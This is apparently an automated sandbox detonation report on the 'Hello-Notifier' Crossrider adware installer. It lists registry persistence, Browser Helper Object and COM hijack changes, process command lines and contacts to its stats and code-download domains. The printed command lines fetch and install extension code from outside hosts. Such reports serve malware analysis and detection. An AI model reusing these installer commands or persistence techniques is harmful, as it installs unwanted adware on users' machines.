| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\Policy = "1" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\AppName = "Hello-Notifier-bg.exe" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\Policy = "1" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5EFA9B9B-8BA5-4DD0-AA9F-7802DC493E} | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0} | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0} | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{22222222-2222-2222-2222-220322792228}\VersionIndependentProgID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{22222222-2222-2222-2222-220322792228} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\VersionIndependentProgID | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\VersionIndependentProgID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{22222222-2222-2222-2222-220322792228}\InprocServer32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{22222222-2222-2222-2222-220322792228} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{22222222-2222-2222-2222-220322792228}\TypeLib\ = "{44444444-4444-4444-4444-440344794428}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{66666666-6666-6666-6666-660366796628}\TypeLib\Version = "1.0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{66666666-6666-6666-6666-660366796628}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{66666666-6666-6666-6666-660366796628}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.Sandbox\ = "CrossriderApp0037928.Sandbox" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\Implemented Categories | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.Sandbox\CLSID\ = "{22222222-2222-2222-2222-220322792228}" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{44444444-4444-4444-4444-440344794428}\1.0\HELPDIR\ = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{55555555-5555-5555-5555-550355795528} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.Sandbox\ = "CrossriderApp0037928.Sandbox" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\ = "Hello-Notifier" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{22222222-2222-2222-2222-220322792228}\ = "CrossriderApp0037928.Sandbox" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.Sandbox.1 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{44444444-4444-4444-4444-440344794428}\1.0\HELPDIR | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\VersionIndependentProgID\ = "CrossriderApp0037928" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{22222222-2222-2222-2222-220322792228}\VersionIndependentProgID\ = "CrossriderApp0037928.Sandbox" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{44444444-4444-4444-4444-440344794428}\1.0\0\win32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{44444444-4444-4444-4444-440344794428}\1.0\0\win32\ = "C:\\Program Files (x86)\\Hello-Notifier\\Hello-Notifier-bho.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{55555555-5555-5555-5555-550355795528}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.Sandbox.1\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.BHO.1\CLSID\ = "{11111111-1111-1111-1111-110311791128}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{44444444-4444-4444-4444-440344794428}\1.0\FLAGS\ = "0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{44444444-4444-4444-4444-440344794428} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.BHO.1\CLSID\ = "{11111111-1111-1111-1111-110311791128}" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\Programmable | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{22222222-2222-2222-2222-220322792228}\Programmable | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\Implemented Categories\ | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{55555555-5555-5555-5555-550355795528}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.BHO\CLSID\ = "{11111111-1111-1111-1111-110311791128}" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\ProgID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{66666666-6666-6666-6666-660366796628}\TypeLib\ = "{44444444-4444-4444-4444-440344794428}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.BHO.1\ = "CrossriderApp0037928" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.BHO.1\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{22222222-2222-2222-2222-220322792228}\ProgID\ = "CrossriderApp0037928.Sandbox.1" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{66666666-6666-6666-6666-660366796628}\TypeLib\ = "{44444444-4444-4444-4444-440344794428}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\ProgID\ = "CrossriderApp0037928.BHO.1" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{22222222-2222-2222-2222-220322792228}\ProgID | C:\Windows\system32\regsvr32.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128} | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\Implemented Categories\ | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640} | C:\Windows\system32\regsvr32.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{22222222-2222-2222-2222-220322792228} | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.BHO\CLSID\ = "{11111111-1111-1111-1111-110311791128}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{55555555-5555-5555-5555-550355795528}\ = "ICrossriderBHO" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\VersionIndependentProgID | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\ProgID | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{22222222-2222-2222-2222-220322792228}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{55555555-5555-5555-5555-550355795528}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{66666666-6666-6666-6666-660366796628}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{66666666-6666-6666-6666-660366796628}\TypeLib\Version = "1.0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640} | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{44444444-4444-4444-4444-440344794428}\1.0\0\win64\ = "C:\\Program Files (x86)\\Hello-Notifier\\Hello-Notifier-bho64.dll" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.BHO.1 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.BHO\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\{11111111-1111-1111-1111-110311791128} = "1" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe
"C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe"
C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe
"C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe"
C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe
"C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe" /installxpi /agentregpath='Hello-Notifier' /extensionfilepath='C:\Program Files (x86)\Hello-Notifier\37928.xpi' /appid=37928 /srcid='000249' /subid='0' /zdata='0' /bic=508EF827A2C94D79B59DCE53EB965A11IE /verifier=35ce2a1a154a4ea1f218b470c6b012c5 /installerversion=1_34_1_29 /installerfullversion=1.34.1.29 /installationtime=1729894741 /statsdomain=http://stats.srvstatsdata.com /errorsdomain=http://errors.srvstatsdata.com /waitforbrowser=300 /extensionid=b2c81c06-4b2f-4808-b3ab-ef6f49041f37@f562099a-8022-43b2-aad5-98abd7b264a4.com /extensionversion=0.93 /prefsbranch=ab2c81c064b2f4808b3abef6f49041f37f562099a802243b2aad598abd7b264a4com37928 /updateurl=https://w9u6a2p6.ssl.hwcdn.net/plugin/ff/update/37928.rdf /extensionname='Hello-Notifier' /extensiondesc='Hello Notifier extention' /publishername='Hello-Notifier' /defbro=ie /allusers /allprofiles /checkfflist /autoupdateulr='http://update.srvstatsdata.com/ff_agent_updates/{CAMP_ID}/update.json' /showthankyoupage /runfrom='installer' /externallog='C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894741.log'
C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe
"C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe" /installapp /agentregpath='Hello-Notifier' /appid=37928 /srcid='000249' /subid='0' /zdata='0' /bic=508EF827A2C94D79B59DCE53EB965A11IE /verifier=35ce2a1a154a4ea1f218b470c6b012c5 /installerversion=1_34_1_29 /installerfullversion=1.34.1.29 /installationtime=1729894741 /statsdomain=http://stats.srvstatsdata.com /errorsdomain=http://errors.srvstatsdata.com /codedownloaddomain=http://app-static.crossrider.com /defbro=ie /allusers /runfrom=installer /externallog='C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894741.log' /downloadfromlocalpath='file://C:\Users\Admin\AppData\Local\Temp\nso408.tmp\extensionData'
C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe
"C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe" /updateapp /dontsenddaily /agentregpath='Hello-Notifier' /appid=37928 /srcid='000249' /subid='0' /zdata='0' /bic=508EF827A2C94D79B59DCE53EB965A11IE /verifier=35ce2a1a154a4ea1f218b470c6b012c5 /installerversion=1_34_1_29 /installerfullversion=1.34.1.29 /installationtime=1729894741 /statsdomain=http://stats.srvstatsdata.com /errorsdomain=http://errors.srvstatsdata.com /codedownloaddomain=http://app-static.crossrider.com /defbro=ie /allusers /runfrom=installer-update /externallog='C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894741.log'
C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s "C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bho.dll"
C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s "C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bho64.dll"
C:\Windows\system32\regsvr32.exe
/s "C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bho64.dll"
C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe
"C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe" /executebg /externallog='C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894741.log'
C:\Windows\system32\taskeng.exe
taskeng.exe {7C836E48-4AFF-4099-9BC0-4F8A566DADB7} S-1-5-18:NT AUTHORITY\System:Service:
C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe
"C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe" /enablebho /agentregpath='Hello-Notifier' /appid=37928 /srcid='000249' /subid='0' /zdata='0' /bic=508EF827A2C94D79B59DCE53EB965A11IE /verifier=35ce2a1a154a4ea1f218b470c6b012c5 /installerversion=1_34_1_29 /installationtime=1729894741 /statsdomain=http://stats.srvstatsdata.com /errorsdomain=http://errors.srvstatsdata.com /bhoguid=11111111-1111-1111-1111-110311791128 /defbro=ie /allusers /autoupdateulr='http://update.srvstatsdata.com/ie_enable_agent_updates/{CAMP_ID}/update.json' /runfrom='installer' /externallog='C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894741.log'
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | update.srvstatsdata.com | udp |
| SG | 13.251.16.150:80 | update.srvstatsdata.com | tcp |
| US | 8.8.8.8:53 | errors.srvstatsdata.com | udp |
| SG | 13.251.16.150:80 | errors.srvstatsdata.com | tcp |
| US | 8.8.8.8:53 | stats.srvstatsdata.com | udp |
| SG | 13.251.16.150:80 | stats.srvstatsdata.com | tcp |
| US | 8.8.8.8:53 | stats.mstatsserv.com | udp |
| SG | 13.251.16.150:80 | stats.srvstatsdata.com | tcp |
| SG | 13.251.16.150:80 | stats.srvstatsdata.com | tcp |
| SG | 13.251.16.150:80 | stats.srvstatsdata.com | tcp |
| US | 8.8.8.8:53 | app-static.crossrider.com | udp |
| SG | 13.251.16.150:80 | stats.srvstatsdata.com | tcp |
| SG | 13.251.16.150:80 | stats.srvstatsdata.com | tcp |
| SG | 13.251.16.150:80 | stats.srvstatsdata.com | tcp |
| SG | 13.251.16.150:80 | stats.srvstatsdata.com | tcp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-25 22:18
Reported
2024-10-25 22:20
Platform
win10v2004-20241007-en
Max time kernel
114s
Max time network
116s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3008 wrote to memory of 4876 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3008 wrote to memory of 4876 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3008 wrote to memory of 4876 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4876 -ip 4876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 612
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-10-25 22:18
Reported
2024-10-25 22:20
Platform
win7-20240903-en
Max time kernel
15s
Max time network
17s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2808 -s 224
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-25 22:18
Reported
2024-10-25 22:20
Platform
win10v2004-20241007-en
Max time kernel
115s
Max time network
118s
Command Line
Signatures
Checks for common network interception software
ACProtect 1.3x - 1.4x DLL software
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Checks installed software on the system
Installs/modifies Browser Helper Object
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128} | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128}\ = "CrossriderApp0037928" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128}\NoExplorer = "1" | C:\Windows\system32\regsvr32.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128} | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128}\NoExplorer = "1" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128}\ = "CrossriderApp0037928" | C:\Windows\system32\regsvr32.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
